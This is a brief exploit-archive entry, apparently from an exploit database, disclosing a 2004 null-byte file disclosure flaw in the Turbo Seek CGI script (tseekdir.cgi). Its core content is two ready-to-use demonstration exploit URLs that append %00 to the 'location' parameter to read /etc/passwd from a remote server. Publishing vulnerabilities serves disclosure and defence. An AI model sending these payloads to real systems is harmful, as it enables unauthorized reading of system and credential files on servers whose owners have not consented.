[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Turbo Seek Null Byte Error Discloses Files to Remote Users
# Published : 2004-09-13
# Author : durito
# Previous Title : PHP-Nuke SQL Injection Edit/Save Message(s) Bug
# Next Title : PHP-Nuke 7.4 Remote Privilege Escalation


Some demonstration exploit URLs are provided: 

/cgi-bin/cgi/tseekdir.cgi?location=/etc/passwd%00
/cgi-bin /tseekdir.cgi?id=799&location=/etc/passwd%00


# www.Syue.com [2004-09-13]